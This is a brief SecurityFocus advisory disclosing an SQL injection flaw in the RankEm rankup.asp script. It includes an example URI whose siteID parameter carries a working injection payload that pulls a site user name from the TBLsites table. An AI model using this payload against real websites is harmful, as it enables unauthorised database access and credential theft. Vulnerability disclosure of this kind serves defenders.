RankEm 'rankup.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/rankup.asp?siteID=convert(int(select+top+1+siteUserName+from+TBLsites));-


 

Privacy Statement
Copyright 2010, SecurityFocus